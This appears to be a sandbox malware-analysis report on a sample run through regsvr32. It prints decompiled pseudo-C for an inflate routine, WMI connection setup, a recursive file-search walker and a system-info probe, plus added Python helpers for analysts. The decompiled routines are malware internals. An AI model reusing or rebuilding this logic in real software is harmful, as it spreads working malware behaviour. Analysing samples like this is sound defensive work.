            													_t209 = _t435[0xc];
            													if(_t319 <= _t209) {
            														_t416 = _t414 + _t209 - _t319;
            														_t210 = _t435[6];
            														if(_t210 > _t319) {
            															_t210 = memcpy(_t368, _t416, _t319);
            															_t435 =  &(_t435[3]);
            															_t368 = _t416 + _t319 + _t319;
            															_t416 = _t368 - _t361;
            														}
            													} else {
            														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
            														_t324 = _t319 - _t209;
            														_t210 = _t435[6];
            														if(_t210 > _t324) {
            															_t210 = memcpy(_t368, _t416, _t324);
            															_t435 =  &(_t435[3]);
            															_t368 = _t416 + _t324 + _t324;
            															_t416 = _t435[0xe];
            															_t326 = _t435[0xc];
            															if(_t210 > _t326) {
            																_t210 = memcpy(_t368, _t416, _t326);
            																_t435 =  &(_t435[3]);
            																_t368 = _t416 + _t326 + _t326;
            																_t416 = _t368 - _t361;
            															}
            														}
            													}
            												} else {
            													_t416 = _t414 + _t208 - _t319;
            													_t210 = _t435[6];
            													if(_t210 > _t319) {
            														_t210 = memcpy(_t368, _t416, _t319);
            														_t435 =  &(_t435[3]);
            														_t368 = _t416 + _t319 + _t319;
            														_t416 = _t368 - _t361;
            													}
            												}
            												_t320 = _t210;
            												memcpy(_t368, _t416, _t320);
            												_t435 =  &(_t435[3]);
            												_t368 = _t416 + _t320 + _t320;
            												_t396 = _t435[0xb];
            												goto L22;
            											}
            											_t423 = _t368 - _t361;
            											_t330 = _t435[6] - 3;
            											 *_t368 =  *_t423;
            											_t424 = _t423 + 3;
            											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
            											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
            											memcpy(_t368 + 3, _t424, _t330);
            											_t435 =  &(_t435[3]);
            											_t368 = _t424 + _t330 + _t330;
            											_t396 = _t435[0xb];
            										} else {
            											_t389 = _t368 - 1;
            											_t222 =  *_t389;
            											_t333 = _t435[6] - 3;
            											 *(_t389 + 1) = _t222;
            											 *(_t389 + 2) = _t222;
            											 *(_t389 + 3) = _t222;
            											_t390 = _t389 + 4;
            											memset(_t390, _t222, _t333 << 0);
            											_t435 =  &(_t435[3]);
            											_t368 = _t390 + _t333;
            										}
            										goto L22;
            									}
            									if(_t253 < _t316) {
            										asm("lodsw");
            										_t336 = _t253;
            										_t253 = _t253 + 0x10;
            										_t431 = _t431 | 0 << _t336;
            										_t316 = _t336;
            									}
            									_t253 = _t253 - _t316;
            									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
            									_t431 = _t431 >> _t316;
            									_t361 = _t361 + _t227;
            									goto L38;
            								}
            								L22:
            							} while (_t435[4] > _t368 && _t435[5] > _t396);
            							L104:
            							if( *0x317e040 == 2) {
            								_t253 = _t431;
            							}
            							_t176 = _t435[0x16];
            							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
            							_t282 = _t253 >> 3;
            							_t397 = _t396 - _t282;
            							_t254 = _t253 - (_t282 << 3);
            							 *(_t176 + 0xc) = _t368;
            							 *(_t351 + 0x3c) = _t254;
            							_t284 = _t254;
            							_t255 =  &(_t435[7]);
            							if(_t435[5] == _t255) {
            								_t266 =  *_t176;
            								_t435[5] = _t266;
            								_t397 = _t397 - _t255 + _t266;
            								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
            							}
            							 *_t176 = _t397;
            							_t258 = (1 << _t284) - 1;
            							if( *0x317e040 == 2) {
            								asm("psrlq mm0, mm1");
            								asm("movd ebp, mm0");
            								asm("emms");
            							}
            							 *(_t351 + 0x38) = _t431 & _t258;
            							_t259 = _t435[5];
            							if(_t259 <= _t397) {
            								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
            							} else {
            								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
            							}
            							_t260 = _t435[4];
            							if(_t260 <= _t368) {
            								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
            							} else {
            								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
            							}
            							asm("popfd");
            							return _t176;
            						}
            						_push(_t172);
            						_push(_t252);
            						_push(_t278);
            						_push(_t347);
            						asm("pushfd");
            						 *_t435 =  *_t435 ^ 0x00200000;
            						asm("popfd");
            						asm("pushfd");
            						_pop(_t364);
            						_t365 = _t364 ^  *_t435;
            						if(_t365 == 0) {
            							L15:
            							 *0x317e040 = 3;
            							L16:
            							_pop(_t347);
            							_pop(_t278);
            							_pop(_t252);
            							_pop(_t172);
            							continue;
            						}
            						asm("cpuid");
            						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
            							goto L15;
            						} else {
            							asm("cpuid");
            							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
            								goto L15;
            							} else {
            								 *0x317e040 = 2;
            								goto L16;
            							}
            						}
            					}
            					asm("emms");
            					asm("movd mm0, ebp");
            					_t431 = _t252;
            					asm("movd mm4, dword [esp]");
            					asm("movq mm3, mm4");
            					asm("movd mm5, dword [esp+0x4]");
            					asm("movq mm2, mm5");
            					asm("pxor mm1, mm1");
            					_t253 = _t435[2];
            					do {
            						asm("psrlq mm0, mm1");
            						if(_t431 <= 0x20) {
            							asm("movd mm6, ebp");
            							asm("movd mm7, dword [esi]");
            							_t396 = _t396 + 4;
            							asm("psllq mm7, mm6");
            							_t431 = _t431 + 0x20;
            							asm("por mm0, mm7");
            						}
            						asm("pand mm4, mm0");
            						asm("movd eax, mm4");
            						asm("movq mm4, mm3");
            						_t173 =  *(_t253 + _t172 * 4);
            						while(1) {
            							_t279 = _t173 & 0x000000ff;
            							asm("movd mm1, ecx");
            							_t431 = _t431 - _t279;
            							if(_t173 == 0) {
            								break;
            							}
            							_t349 = _t173 >> 0x10;
            							if((_t173 & 0x00000010) == 0) {
            								if((_t173 & 0x00000040) != 0) {
            									goto L97;
            								}
            								asm("psrlq mm0, mm1");
            								asm("movd ecx, mm0");
            								_t173 =  *(_t253 + ((_t279 &  *(0x31766ec + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
            								continue;
            							}
            							_t178 = _t173 & 0x0000000f;
            							if(_t178 != 0) {
            								asm("psrlq mm0, mm1");
            								asm("movd mm1, eax");
            								asm("movd ecx, mm0");
            								_t431 = _t431 - _t178;
            								_t349 = _t349 + (_t279 &  *(0x31766ec + _t178 * 4));
            							}
            							asm("psrlq mm0, mm1");
            							if(_t431 <= 0x20) {
            								asm("movd mm6, ebp");
            								asm("movd mm7, dword [esi]");
            								_t396 = _t396 + 4;
            								asm("psllq mm7, mm6");
            								_t431 = _t431 + 0x20;
            								asm("por mm0, mm7");
            							}
            							asm("pand mm5, mm0");
            							asm("movd eax, mm5");
            							asm("movq mm5, mm2");
            							_t179 =  *(_t435[3] + _t178 * 4);
            							while(1) {
            								_t287 = _t179 & 0x000000ff;
            								_t253 = _t179 >> 0x10;
            								_t431 = _t431 - _t287;
            								asm("movd mm1, ecx");
            								if((_t179 & 0x00000010) != 0) {
            									break;
            								}
            								if((_t179 & 0x00000040) != 0) {
            									goto L96;
            								}
            								asm("psrlq mm0, mm1");
            								asm("movd ecx, mm0");
            								_t179 =  *(_t435[3] + ((_t287 &  *(0x31766ec + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
            							}
            							_t182 = _t179 & 0x0000000f;
            							if(_t182 == 0) {
            								if(_t253 != 1 || _t435[0xa] == _t368) {
            									L76:
            									_t435[0xb] = _t396;
            									_t184 = _t368 - _t435[0xa];
            									if(_t184 < _t253) {
            										_t185 = _t435[0xd];
            										_t291 =  ~_t184;
            										_t403 = _t435[0xe];
            										if(_t185 < _t253) {
            											goto L100;
            										}
            										_t292 = _t291 + _t253;
            										if(_t435[0xc] != 0) {
            											_t186 = _t435[0xc];
            											if(_t292 <= _t186) {
            												_t405 = _t403 + _t186 - _t292;
            												if(_t349 > _t292) {
            													_t349 = _t349 - _t292;
            													memcpy(_t368, _t405, _t292);
            													_t435 =  &(_t435[3]);
            													_t368 = _t405 + _t292 + _t292;
            													_t405 = _t368 - _t253;
            												}
            											} else {
            												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
            												_t296 = _t292 - _t186;
            												if(_t349 > _t296) {
            													_t349 = _t349 - _t296;
            													memcpy(_t368, _t405, _t296);
            													_t435 =  &(_t435[3]);
            													_t368 = _t405 + _t296 + _t296;
            													_t405 = _t435[0xe];
            													_t298 = _t435[0xc];
            													if(_t349 > _t298) {
            														_t349 = _t349 - _t298;
            														memcpy(_t368, _t405, _t298);
            														_t435 =  &(_t435[3]);
            														_t368 = _t405 + _t298 + _t298;
            														_t405 = _t368 - _t253;
            													}
            												}
            											}
            										} else {
            											_t405 = _t403 + _t185 - _t292;
            											if(_t349 > _t292) {
            												_t349 = _t349 - _t292;
            												memcpy(_t368, _t405, _t292);
            												_t435 =  &(_t435[3]);
            												_t368 = _t405 + _t292 + _t292;
            												_t405 = _t368 - _t253;
            											}
            										}
            										_t293 = _t349;
            										_t172 = memcpy(_t368, _t405, _t293);
            										_t435 =  &(_t435[3]);
            										_t368 = _t405 + _t293 + _t293;
            										_t396 = _t435[0xb];
            										_t253 = _t435[2];
            										goto L64;
            									}
            									_t412 = _t368 - _t253;
            									_t302 = _t349 - 3;
            									 *_t368 =  *_t412;
            									_t413 = _t412 + 3;
            									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
            									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
            									_t172 = memcpy(_t368 + 3, _t413, _t302);
            									_t435 =  &(_t435[3]);
            									_t368 = _t413 + _t302 + _t302;
            									_t396 = _t435[0xb];
            									_t253 = _t435[2];
            									goto L64;
            								} else {
            									_t380 = _t368 - 1;
            									_t194 =  *_t380;
            									_t305 = _t349 - 3;
            									 *(_t380 + 1) = _t194;
            									 *(_t380 + 2) = _t194;
            									 *(_t380 + 3) = _t194;
            									_t381 = _t380 + 4;
            									_t172 = memset(_t381, _t194, _t305 << 0);
            									_t435 =  &(_t435[3]);
            									_t368 = _t381 + _t305;
            									_t253 = _t435[2];
            									L64:
            									if(_t435[4] <= _t368) {
            										goto L104;
            									}
            									goto L65;
            								}
            							}
            							asm("psrlq mm0, mm1");
            							asm("movd mm1, eax");
            							asm("movd ecx, mm0");
            							_t431 = _t431 - _t182;
            							_t253 = _t253 + (_t287 &  *(0x31766ec + _t182 * 4));
            							goto L76;
            						}
            						_t172 = _t173 >> 0x10;
            						asm("stosb");
            						goto L64;
            						L65:
            					} while (_t435[5] > _t396);
            					goto L104;
            				}
            			}

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
            • API String ID: 0-3089872807
            • Opcode ID: fbb05e6fe0b93efaddebcb248550951ec077045e3aba002fa38e901129f9423b
            • Instruction ID: e5e93863c81db101ae714a2836a808b42ecec1f7ca8d792261b10356b704a4b4
            • Opcode Fuzzy Hash: fbb05e6fe0b93efaddebcb248550951ec077045e3aba002fa38e901129f9423b
            • Instruction Fuzzy Hash: E4120432A08B558FC719CE38C59426ABBF1EB8C354F4D862DE895D7B05D371E988CB81
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E0316E485(void* __ecx) {
            				char _v8;
            				void* _v12;
            				char* _t15;
            				intOrPtr* _t16;
            				void* _t21;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				intOrPtr* _t25;
            				void* _t30;
            				void* _t33;
            
            				_v12 = 0;
            				_v8 = 0;
            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
            				_t15 =  &_v12;
            				__imp__CoCreateInstance(0x317c8a0, 0, 1, 0x317c8b0, _t15);
            				if(_t15 < 0) {
            					L5:
            					_t23 = _v8;
            					if(_t23 != 0) {
            						 *((intOrPtr*)( *_t23 + 8))(_t23);
            					}
            					_t24 = _v12;
            					if(_t24 != 0) {
            						 *((intOrPtr*)( *_t24 + 8))(_t24);
            					}
            					_t16 = 0;
            				} else {
            					__imp__#2(__ecx);
            					_t25 = _v12;
            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
            					if(_t21 < 0) {
            						goto L5;
            					} else {
            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
            						if(_t21 < 0) {
            							goto L5;
            						} else {
            							_t16 = E03168DC9(8);
            							if(_t16 == 0) {
            								goto L5;
            							} else {
            								 *((intOrPtr*)(_t16 + 4)) = _v12;
            								 *_t16 = _v8;
            							}
            						}
            					}
            				}
            				return _t16;
            			}

            (instruction address column for the E0316E485 listing above: 39 entries, 0x0316e492 to 0x0316e538; 0x00000000 marks lines without an address)

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4A9
            • CoCreateInstance.OLE32(0317C8A0,00000000,00000001,0317C8B0,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0316E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4F6
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: bbc4f4d5384a81f093b55f8fc2624197b210edeb83f2daf1a27023c68b330b00
            • Instruction ID: 2f596e7c65217c6bb59c858be9550b7205e7eb8866a5c2c1d6cf8dfdbb6fdfab
            • Opcode Fuzzy Hash: bbc4f4d5384a81f093b55f8fc2624197b210edeb83f2daf1a27023c68b330b00
            • Instruction Fuzzy Hash: B1213A78600245BFDB289BA6DD5CE9BBF7CEFCAB25F04015CB505A6190D770DA50CA70
            Uniqueness

            Uniqueness Score: -1.00%
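
            The listing above initialises COM, sets process-wide security with impersonation level 3 (RPC_C_IMP_LEVEL_IMPERSONATE), creates an in-process object (dwClsContext 1 = CLSCTX_INPROC_SERVER) from the CLSID/IID pair stored at 0x317c8a0/0x317c8b0, allocates a BSTR from the string passed in ecx, calls slot 3 (offset 0xc) of the returned interface with that BSTR, six zero arguments and an out-pointer, applies CoSetProxyBlanket(RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE) to the object it got back, and stores both interface pointers in an 8-byte heap block. That shape matches IWbemLocator::ConnectServer (fourth vtable slot, eight parameters, out-pointer an IWbemServices), but the report leaves the two GUIDs unresolved, so a WMI connection is an inference to confirm against the dump. The Python below is an added helper written for this page, not code from the report or the sample: it decodes the GUIDs at those addresses from a dump loaded at 0x03160000, names the vtable slot and the RPC constants. The dump in the block is constructed (zero-filled, with the WbemLocator GUIDs written in at the two addresses) so the example runs offline; on the real .sdmp the names only come out if the inference is right.

```python
import uuid

IMAGE_BASE = 0x03160000  # "Offset: 03160000" of the .sdmp the listing was taken from

# Candidate identifiers from the Windows SDK (wbemcli.h). The report does not
# resolve the two GUID pointers; these are the values to compare them against.
KNOWN_GUIDS = {
    uuid.UUID("4590F811-1D3A-11D0-891F-00AA004B2E24"): "CLSID_WbemLocator",
    uuid.UUID("DC12A687-737F-11CF-884D-00AA004B2E24"): "IID_IWbemLocator",
}

# IWbemLocator vtable on x86: three 4-byte IUnknown slots, then ConnectServer.
IWBEMLOCATOR_VTABLE = {0x0: "QueryInterface", 0x4: "AddRef", 0x8: "Release", 0xC: "ConnectServer"}

CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
RPC_AUTHN = {0: "RPC_C_AUTHN_NONE", 9: "RPC_C_AUTHN_GSS_NEGOTIATE", 10: "RPC_C_AUTHN_WINNT",
             16: "RPC_C_AUTHN_GSS_KERBEROS"}
RPC_AUTHN_LEVEL = {1: "RPC_C_AUTHN_LEVEL_NONE", 2: "RPC_C_AUTHN_LEVEL_CONNECT",
                   3: "RPC_C_AUTHN_LEVEL_CALL", 4: "RPC_C_AUTHN_LEVEL_PKT",
                   5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY", 6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
RPC_IMP_LEVEL = {1: "RPC_C_IMP_LEVEL_ANONYMOUS", 2: "RPC_C_IMP_LEVEL_IDENTIFY",
                 3: "RPC_C_IMP_LEVEL_IMPERSONATE", 4: "RPC_C_IMP_LEVEL_DELEGATE"}


def guid_at(dump, va):
    """Decode the 16-byte GUID stored at virtual address va.
    In memory a GUID keeps Data1..Data3 little-endian and Data4 as raw bytes,
    which is exactly the layout uuid.UUID(bytes_le=...) expects."""
    off = va - IMAGE_BASE
    if off < 0:
        raise ValueError(f"{va:#x} is below the dump base")
    raw = bytes(dump[off:off + 16])
    if len(raw) != 16:
        raise ValueError(f"GUID at {va:#x} runs past the end of the dump")
    return uuid.UUID(bytes_le=raw)


def resolve_com_call(dump, clsid_va, iid_va, clsctx, vtable_offset):
    """Name the CLSID/IID passed to CoCreateInstance and the vtable slot called on the result."""
    clsid, iid = guid_at(dump, clsid_va), guid_at(dump, iid_va)
    method = f"slot {vtable_offset // 4}"
    if KNOWN_GUIDS.get(iid) == "IID_IWbemLocator":
        method = IWBEMLOCATOR_VTABLE.get(vtable_offset, method)
    return {
        "clsid": str(clsid), "clsid_name": KNOWN_GUIDS.get(clsid, "unknown"),
        "iid": str(iid), "iid_name": KNOWN_GUIDS.get(iid, "unknown"),
        "clsctx": CLSCTX.get(clsctx, f"{clsctx:#x}"),
        "method": method,
    }


def describe_proxy_blanket(authn_svc, authn_level, imp_level):
    """Name the RPC_C_* constants the listing passes to CoSetProxyBlanket."""
    return (RPC_AUTHN.get(authn_svc, f"{authn_svc:#x}"),
            RPC_AUTHN_LEVEL.get(authn_level, f"{authn_level:#x}"),
            RPC_IMP_LEVEL.get(imp_level, f"{imp_level:#x}"))


def build_sample_dump():
    """Constructed stand-in for the .sdmp: zero-filled, with the WbemLocator GUIDs
    written at the two addresses the listing passes. Not data from the real dump."""
    dump = bytearray(0x317c8b0 + 16 - IMAGE_BASE)
    for va, guid in ((0x317c8a0, uuid.UUID("4590F811-1D3A-11D0-891F-00AA004B2E24")),
                     (0x317c8b0, uuid.UUID("DC12A687-737F-11CF-884D-00AA004B2E24"))):
        dump[va - IMAGE_BASE:va - IMAGE_BASE + 16] = guid.bytes_le
    return bytes(dump)


if __name__ == "__main__":
    d = build_sample_dump()
    print(resolve_com_call(d, 0x317c8a0, 0x317c8b0, 1, 0xC))
    print(describe_proxy_blanket(0xA, 3, 3))
```

            To run it against the real memory, replace build_sample_dump() with the bytes of the 00000003.00000002.252637894.0000000003160000 dump listed under Memory Dump Source; any other CLSID decodes to "unknown" and the vtable slot falls back to its index, which is the signal that the WMI reading was wrong.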

            C-Code - Quality: 78%
            			E0316C123(void* __ecx, void* __fp0, intOrPtr _a16) {
            				char _v12;
            				WCHAR* _v16;
            				struct _WIN32_FIND_DATAW _v608;
            				WCHAR* _t24;
            				intOrPtr _t31;
            				intOrPtr _t41;
            				void* _t45;
            				intOrPtr _t46;
            				void* _t48;
            				intOrPtr _t54;
            				void* _t59;
            				char _t60;
            				void* _t61;
            				void* _t62;
            				void* _t63;
            				void* _t75;
            
            				_t75 = __fp0;
            				_push(0);
            				_t48 = __ecx;
            				_push(L"\\*");
            				_t24 = E03169C50(__ecx);
            				_t63 = _t62 + 0xc;
            				_v16 = _t24;
            				if(_t24 == 0) {
            					return _t24;
            				}
            				_t59 = FindFirstFileW(_t24,  &_v608);
            				if(_t59 == 0xffffffff) {
            					L14:
            					return E03168DDF( &_v16, 0xfffffffe);
            				} else {
            					goto L2;
            				}
            				do {
            					L2:
            					if(E0316C0FB( &(_v608.cFileName)) != 0) {
            						goto L12;
            					}
            					if((_v608.dwFileAttributes & 0x00000010) != 0) {
            						L10:
            						_push(0);
            						_push( &(_v608.cFileName));
            						_push(0x317c9d8);
            						_t60 = E03169C50(_t48);
            						_t63 = _t63 + 0x10;
            						_v12 = _t60;
            						if(_t60 != 0) {
            							_t54 =  *0x317f8d0; // 0x4faf8c0
            							 *((intOrPtr*)(_t54 + 0xc0))(1);
            							_push(1);
            							_push(1);
            							_push(0);
            							E0316C123(_t60, _t75, 1, 5, E0317017A, _a16);
            							_t63 = _t63 + 0x1c;
            							E03168DDF( &_v12, 0xfffffffe);
            						}
            						goto L12;
            					}
            					_t61 = 0;
            					do {
            						_t7 = _t61 + 0x317f9dc; // 0x0
            						_push( *_t7);
            						_push( &(_v608.cFileName));
            						_t41 =  *0x317f8dc; // 0x4fafb90
            						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
            							goto L8;
            						}
            						_t45 = E0317017A(_t75, _t48,  &_v608, _a16);
            						_t63 = _t63 + 0xc;
            						if(_t45 == 0) {
            							break;
            						}
            						_t46 =  *0x317f8d0; // 0x4faf8c0
            						 *((intOrPtr*)(_t46 + 0xc0))(1);
            						L8:
            						_t61 = _t61 + 4;
            					} while (_t61 < 4);
            					if((_v608.dwFileAttributes & 0x00000010) == 0) {
            						goto L12;
            					}
            					goto L10;
            					L12:
            				} while (FindNextFileW(_t59,  &_v608) != 0);
            				_t31 =  *0x317f8d0; // 0x4faf8c0
            				 *((intOrPtr*)(_t31 + 0x80))(_t59);
            				goto L14;
            			}

            (instruction address column for the E0316C123 listing above: 70 entries, 0x0316c123 to 0x0316c24b; 0x00000000 marks lines without an address)

            APIs
            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 0316C154
            • FindNextFileW.KERNEL32(00000000,?), ref: 0316C237
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$FirstNext
            • String ID:
            • API String ID: 1690352074-0
            • Opcode ID: 83b0ede5e3a3b15acb435da1470e0299ea790cd712980072fab98460440c1358
            • Instruction ID: 49757ec99c9f4c3b9c2909df3389f7bb27222eec7563c7fa2243e4152ce311d4
            • Opcode Fuzzy Hash: 83b0ede5e3a3b15acb435da1470e0299ea790cd712980072fab98460440c1358
            • Instruction Fuzzy Hash: A831C472A00314AFDB10EBE49C49FAB77B9AB4C710F1800A4F915E61C1EB7199A18BE0
            Uniqueness

            Uniqueness Score: -1.00%
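
            E0316C123 is a recursive directory walk: it appends L"\\*" to the path through E03169C50 (which takes a format-like argument list and returns a new string), iterates with FindFirstFileW/FindNextFileW over a 592-byte stack buffer (the gap between _v608 and _v16, the size of WIN32_FIND_DATAW), skips entries that E0316C0FB rejects, recurses into anything carrying FILE_ATTRIBUTE_DIRECTORY (0x10) by building a child path from the string at 0x317c9d8 and cFileName, and otherwise matches cFileName against the single table entry at 0x317f9dc via slot +0x18 of the object at 0x317f8dc before handing the record to E0317017A. The loop bound (`_t61 < 4` with step 4) means exactly one pattern is tested. Slots +0xc0 (called with 1 after each hit and after each recursion) and +0x80 (called with the search handle at the end) of the object at 0x317f8d0 are resolved at run time and not named in the report. The block below is an added Python helper written for this page, not code from the sample or the report: it parses a WIN32_FIND_DATAW record from raw bytes (useful when the buffer is carved from a stack dump) and replays the branch order above. Assumed rather than shown by the listing: E0316C0FB filters "." and "..", and the +0x18 slot is a case-insensitive wildcard matcher in the style of PathMatchSpecW; the records are constructed.

```python
import fnmatch
import struct

FILE_ATTRIBUTE_DIRECTORY = 0x10
# WIN32_FIND_DATAW: DWORD dwFileAttributes; FILETIME ftCreationTime, ftLastAccessTime,
# ftLastWriteTime; DWORD nFileSizeHigh, nFileSizeLow, dwReserved0, dwReserved1;
# WCHAR cFileName[260]; WCHAR cAlternateFileName[14]. Total 592 bytes, which is the
# distance between _v608 and _v16 in the listing.
_FIXED = struct.Struct("<IQQQIIII")              # 44 bytes, so cFileName starts at 0x2C
CFILENAME_OFF, CFILENAME_LEN = _FIXED.size, 260 * 2
ALTNAME_OFF, ALTNAME_LEN = CFILENAME_OFF + CFILENAME_LEN, 14 * 2
FIND_DATA_SIZE = ALTNAME_OFF + ALTNAME_LEN         # 592


def _wstr(raw):
    """NUL-terminated UTF-16LE field to str."""
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def parse_find_data(blob):
    """Decode one WIN32_FIND_DATAW record from raw bytes."""
    if len(blob) < FIND_DATA_SIZE:
        raise ValueError("short WIN32_FIND_DATAW")
    attrs, _ctime, _atime, wtime, hi, lo, _r0, _r1 = _FIXED.unpack_from(blob, 0)
    return {
        "attributes": attrs,
        "is_directory": bool(attrs & FILE_ATTRIBUTE_DIRECTORY),
        "size": (hi << 32) | lo,
        "last_write": wtime,  # FILETIME: 100 ns ticks since 1601-01-01
        "name": _wstr(blob[CFILENAME_OFF:CFILENAME_OFF + CFILENAME_LEN]),
        "alt_name": _wstr(blob[ALTNAME_OFF:ALTNAME_OFF + ALTNAME_LEN]),
    }


def build_find_data(name, attrs=0, size=0, alt_name=""):
    """Constructed record for testing; not bytes taken from the sample's stack."""
    blob = bytearray(FIND_DATA_SIZE)
    _FIXED.pack_into(blob, 0, attrs, 0, 0, 0, size >> 32, size & 0xFFFFFFFF, 0, 0)
    for off, limit, text in ((CFILENAME_OFF, CFILENAME_LEN, name),
                             (ALTNAME_OFF, ALTNAME_LEN, alt_name)):
        enc = text.encode("utf-16-le")[:limit - 2]  # leave room for the terminator
        blob[off:off + len(enc)] = enc
    return bytes(blob)


def classify_entry(blob, pattern):
    """Replay the branch order of E0316C123 for one FindFirst/NextFileW record.
    Assumptions (not established by the report): E0316C0FB rejects '.' and '..',
    and the table call at +0x18 is a case-insensitive wildcard match."""
    e = parse_find_data(blob)
    if e["name"] in (".", ".."):
        return "skip"                # E0316C0FB != 0 -> straight to FindNextFileW
    if e["is_directory"]:
        return "recurse"             # tested before the pattern: directories never reach the callback
    if fnmatch.fnmatchcase(e["name"].lower(), pattern.lower()):
        return "callback"            # E0317017A receives the record
    return "ignore"


if __name__ == "__main__":
    for rec in (build_find_data("..", 0x10), build_find_data("docs", 0x10),
                build_find_data("Notes.TXT", 0x20, 1234), build_find_data("a.bin", 0x20)):
        print(parse_find_data(rec)["name"], "->", classify_entry(rec, "*.txt"))
```

            The one thing the parser does not tell you is what the pattern at 0x317f9dc is; that string has to be read from the dump, and with it the walk's purpose (which file types E0317017A is handed) follows directly.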

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,0316521F,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0316A205
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Time$FileSystem
            • String ID:
            • API String ID: 2086374402-0
            • Opcode ID: 77f886fbb8b3d5d9b9fa33a0efb9e4fd6be3658280f90d74204f0435cad07244
            • Instruction ID: 7cc62371f0ed96cdb2d7bbcc61a4364b995669be4e00b2eeba5e549e3e95e301
            • Opcode Fuzzy Hash: 77f886fbb8b3d5d9b9fa33a0efb9e4fd6be3658280f90d74204f0435cad07244
            • Instruction Fuzzy Hash: 34E04875D003146FD710EE689D05F5AFBBDEB84600F5545559C41F7344E670AA048690
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0316DDE7(void* __ecx) {
            				struct _SYSTEM_INFO _v40;
            				void* _t5;
            
            				if(__ecx == 0) {
            					GetSystemInfo( &_v40);
            					return _v40.dwOemId & 0x0000ffff;
            				} else {
            					_t5 = 9;
            					return _t5;
            				}
            			}

            (instruction address column for the E0316DDE7 listing above: 7 entries, 0x0316ddef to 0x0316ddf5)

            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0316E1C0), ref: 0316DDFA
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: a30bf8f36294ea15e62829ed31cda25f7f7d415ede12237d95b1e638ad1e5e8b
            • Instruction ID: 30a23b75d22ec34b4ccca6b661df05e35e2b0be8cb40fa87eed318069ef1594c
